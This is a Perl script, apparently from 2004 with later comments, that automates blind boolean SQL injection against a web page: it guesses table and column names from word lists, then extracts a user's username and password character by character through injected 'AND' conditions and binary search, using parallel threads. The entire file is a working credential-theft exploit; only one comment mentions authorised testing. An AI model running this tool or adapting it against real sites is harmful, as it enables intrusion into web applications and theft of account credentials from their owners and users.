#!/usr/local/ActivePerl-5.8/bin/perl -w
use IO::Socket;
use threads;
# Subroutine definitions
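# Split the global $url into the globals $host, $path and (optionally) $port.
# Accepts "http://host[:port]/path" or "host[:port]/path"; the scheme is
# optional and matched case-insensitively, and a missing path defaults to "/".
# Dies with a clear message when the url has no host part or carries a
# non-numeric port, instead of leaving $host empty and failing much later in
# connect() with an unhelpful "Could not connect to " error.
sub gethost
{
    our ($url, $host, $path, $port);
    if ($url =~ m{\A(?:http://)?([^/]+)(?:/(.*))?\z}i)
    {
        $host = $1;
        $path = '/' . (defined $2 ? $2 : '');
        if ($host =~ /\A(.*):(.*)\z/)
        {
            $host = $1;
            $port = $2;
            die "Invalid port '$port' in url '$url'\n" unless $port =~ /\A\d+\z/;
        }
    }
    else
    {
        die "Cannot parse url '$url' (expected http://host[:port]/path)\n";
    }
}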
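# Find which candidate column name from a word list exists in $table_user.
# $_[0] is the word-list path, one column name per line. For each candidate an
# injected "AND exists (select <col> from <table>)" probe is sent through
# connect(); the first candidate whose response still contains $info is
# printed and returned. Returns undef when no candidate matches.
# Trailing whitespace/CR is stripped and blank lines are skipped, so a word
# list without a final newline (which the old chomp-in-condition loop silently
# dropped) or with DOS line endings is read completely.
# Uses the globals $table_user, $path1 and $info.
sub fieInput
{
    my ($wordlist) = @_;
    my $field;
    open(my $fh, '<', $wordlist) or die "can't open file $wordlist: $!\n";
    while (defined(my $input = <$fh>))
    {
        $input =~ s/\s+\z//;
        next unless length $input;
        my $sql = "exists%20(select%20$input%20from%20$table_user)";
        $path1 = "%20AND%20$sql";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            $field = $input;
            print "\t+-- $field --+";
            last;
        }
    }
    close($fh);
    return $field;
}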
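# Find which candidate table name from a word list exists on the target.
# $_[0] is the word-list path, one table name per line. For each candidate an
# injected "AND 0<>(select count(*) from <table>)" probe is sent through
# connect(); the first candidate whose response still contains $info is
# printed and returned. Returns undef when no candidate matches.
# Trailing whitespace/CR is stripped and blank lines are skipped, so a word
# list without a final newline (which the old chomp-in-condition loop silently
# dropped) or with DOS line endings is read completely.
# Uses the globals $path1 and $info.
sub tabInput
{
    my ($wordlist) = @_;
    my $table;
    open(my $fh, '<', $wordlist) or die "can't open file $wordlist: $!\n";
    while (defined(my $input = <$fh>))
    {
        $input =~ s/\s+\z//;
        next unless length $input;
        my $sql = "0<>(select%20count(*)%20from%20$input)";
        $path1 = "%20AND%20$sql";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            $table = $input;
            print "\t+-- $table --+\n";
            last;
        }
    }
    close($fh);
    return $table;
}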
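# Send one injected GET request and return the raw response lines.
# The request line is "GET $path$path1": $path is the page taken from the url
# and $path1 the URL-encoded " AND <condition>" the caller has set. Every line
# read from the socket (headers and body) is returned so callers can search it
# for $info. Dies when the TCP connection to $host:$port cannot be opened.
# Note: this sub shadows the built-in connect(); callers must invoke it as
# &connect, since a bare connect() would resolve to the socket built-in.
sub connect
{
    # HTTP header lines must end in CRLF; the previous bare "\n" only worked
    # on lenient servers. A non-default port belongs in the Host header too.
    my $host_header = (defined $port && $port != 80) ? "$host:$port" : $host;
    my $req = "GET $path$path1 HTTP/1.0\r\n"
            . "Host: $host_header\r\n"
            . "Referer: $host\r\n"
            . "Cookie: \r\n\r\n";
    # The original had a mangled "||" here (box-drawing characters), which does
    # not even compile.
    my $connection = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
    ) or die "Sorry! Could not connect to $host:$port ($@)\n";
    print {$connection} $req;
    my @res = <$connection>;
    close $connection;
    return @res;
}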
# Recover one integer from the target by blind binary search.
# Call as crack(@weights, $subquery): every argument but the last is a bit
# weight, highest first (e.g. 128,64,...,1); the last is a URL-encoded SELECT
# that yields a single number. Each step injects " AND <guess><(<subquery>)"
# and reads the presence of $info in the response as "yes": on yes the next
# weight is added, on no it is subtracted. A "yes" on the final weight bumps
# the guess by one more. Prints ">" once per probe and returns the guess.
# Relies on the globals $path1 and $info and on &connect.
sub crack
{
    my @weights  = @_;
    my $subquery = pop @weights;
    my $guess;
    my $direction = 1;
    my $step      = 0;
    for my $weight (@weights)
    {
        print ">";
        $step++;
        $guess += $direction * $weight;
        $path1 = "%20AND%20$guess<($subquery)";
        my @response = &connect;
        if ("@response" =~ /$info/)
        {
            $direction = 1;
            $guess++ if $step == @weights;
        }
        else
        {
            $direction = -1;
        }
    }
    return $guess;
}
# Turn a code value recovered by crack() back into the character's bytes.
# Values below 256 are emitted as a single byte. Larger values are what the
# main script passes in for a character whose asc() came back negative
# (it cracks abs(asc(...)) in that case): the result is the 16-bit two's
# complement of the value, emitted high byte first.
sub asc
{
    my ($code) = @_;
    return pack('C*', $code) if $code < 256;
    # (-$code) modulo 2**16 as a big-endian word is exactly the last four hex
    # digits of sprintf("%X", -$code) packed with "H*".
    my $word = (-$code) & 0xFFFF;
    return pack('n', $word);
}
# Initialise global variables
# Global state read by the subroutines above (each ithread gets its own copy).
$url  = '';    # target url, filled from @ARGV or STDIN
$host = '';    # host part of $url
$path = '';    # path part of $url
$info = '';    # text expected in the page when the injected condition is true
$port = 80;
# Bit-weight ladders for crack(): powers of two from the highest bit down to 1.
# With n weights the ladder resolves values up to about 2**n.
@dic1 = map { 1 << $_ } reverse 0 .. 7;     # 8 bits  (128..1): the row id
@dic2 = map { 1 << $_ } reverse 0 .. 4;     # 5 bits  (16..1): field lengths
@dic3 = map { 1 << $_ } reverse 0 .. 6;     # 7 bits  (64..1): single-byte asc()
@dic4 = map { 1 << $_ } reverse 0 .. 14;    # 15 bits (16384..1): abs() of negative asc()
print "\n\n";
print "\t* The script Crack user&pass for Sql-injection system *\n";
print "\t* hemon @ East China Jiaotong Univercity , 2004.5 *\n";
print "\t* E-mail : the108one @ yahoo.com.cn QQ :24303484 *\n";
# Obtain the host address and path
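# Read the two inputs (url, marker) from the command line, or prompt on STDIN
# when exactly two arguments were not given, then validate them before use.
$ARGC = @ARGV;
$url  = $ARGV[0];
$info = $ARGV[1];
if ($ARGC != 2)
{
    print "\n\t* Please input the url : *\n";
    chomp($url = <STDIN>);
    print "\n\t* Please input the infomation : *\n";
    chomp($info = <STDIN>);
}
# Fail fast here rather than inside a worker thread later (a die in a thread
# only makes join() return undef). $info is interpolated as a regular
# expression against every response, so an empty pattern would match every
# page and an unparsable one would abort each probe.
die "No url given.\n" unless defined $url && length $url;
die "No information (marker) given; an empty pattern would match every page.\n"
    unless defined $info && length $info;
die "Information '$info' is not a valid regular expression: $@\n"
    unless eval { qr/$info/; 1 };
gethost();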
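print "\n\n开始在 $host 上进行测试,请等待......\n\n";

# --- Guessing phase ---------------------------------------------------------
# Every probe appends an injected " AND <condition>" to the page request and
# treats the presence of $info in the response as "condition true". Only run
# this against systems you are authorised to test.
# Each lookup result is checked before it is used: a word list with no match,
# or a worker thread that died, previously left these undef and every later
# query was then built around an empty name.
print "+-- Table --+";
$table_user = tabInput('table_user.txt');
die "\nNo table name from table_user.txt matched on $host.\n"
    unless defined $table_user;

print "+-- Filed --+";
my $thread1 = threads->create("fieInput", "field_Username.txt");
my $thread2 = threads->create("fieInput", "field_password.txt");
my $thread3 = threads->create("fieInput", "field_id.txt");
$field_Username = $thread1->join();
$field_password = $thread2->join();
$field_id       = $thread3->join();
die "\nNo username column from field_Username.txt matched.\n" unless defined $field_Username;
die "\nNo password column from field_password.txt matched.\n" unless defined $field_password;
die "\nNo id column from field_id.txt matched.\n"             unless defined $field_id;
print "\n\n";

# Lowest id in the table (8-bit ladder), then both field lengths (5-bit ladder,
# so lengths beyond roughly 32 characters cannot be resolved) in parallel.
$sql = "select%20min($field_id)%20from%20$table_user";
$id  = crack(@dic1, "$sql");
$sql = "select%20len($field_Username)%20from%20$table_user%20where%20$field_id=$id";
my $thread4 = threads->create("crack", @dic2, $sql);
$sql = "select%20len($field_password)%20from%20$table_user%20where%20$field_id=$id";
my $thread5 = threads->create("crack", @dic2, $sql);
$userlen = $thread4->join();
$passlen = $thread5->join();
die "\nCould not recover the field lengths (a worker thread failed).\n"
    unless defined $userlen && defined $passlen;

# Spawn one crack() worker per character position of $field (1..$len) and
# return the thread handles indexed from 1 (slot 0 stays undef).
# For each position the main thread first asks whether asc() of that
# character is negative; if so the worker cracks abs(asc(...)) with the 15-bit
# ladder, otherwise asc(...) with the 7-bit ladder.
sub _spawn_char_workers
{
    my ($field, $len) = @_;
    my @workers;
    for my $pos (1 .. $len)
    {
        my $query = "select%20asc(mid($field,$pos,1))%20from%20$table_user%20where%20$field_id=$id";
        $path1 = "%20AND%200>($query)";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            my $abs_query = "select%20abs(asc(mid($field,$pos,1)))%20from%20$table_user%20where%20$field_id=$id";
            $workers[$pos] = threads->create("crack", @dic4, $abs_query);
        }
        else
        {
            $workers[$pos] = threads->create("crack", @dic3, $query);
        }
    }
    return @workers;
}

@username = _spawn_char_workers($field_Username, $userlen);
@password = _spawn_char_workers($field_password, $passlen);
for my $pos (1 .. $userlen)
{
    $username[$pos] = $username[$pos]->join();
}
for my $pos (1 .. $passlen)
{
    $password[$pos] = $password[$pos]->join();
}

# Convert the recovered codes to characters and print both fields.
print "\n\n\t+-- $field_Username --+\t";
for my $pos (1 .. $userlen)
{
    $username[$pos] = asc($username[$pos]);
    print "$username[$pos]";
}
print "\n\t+-- $field_password --+\t";
for my $pos (1 .. $passlen)
{
    $password[$pos] = asc($password[$pos]);
    print "$password[$pos]";
}
print "\n\n";
# Windows-only: keeps the console window open until a key is pressed.
system('pause');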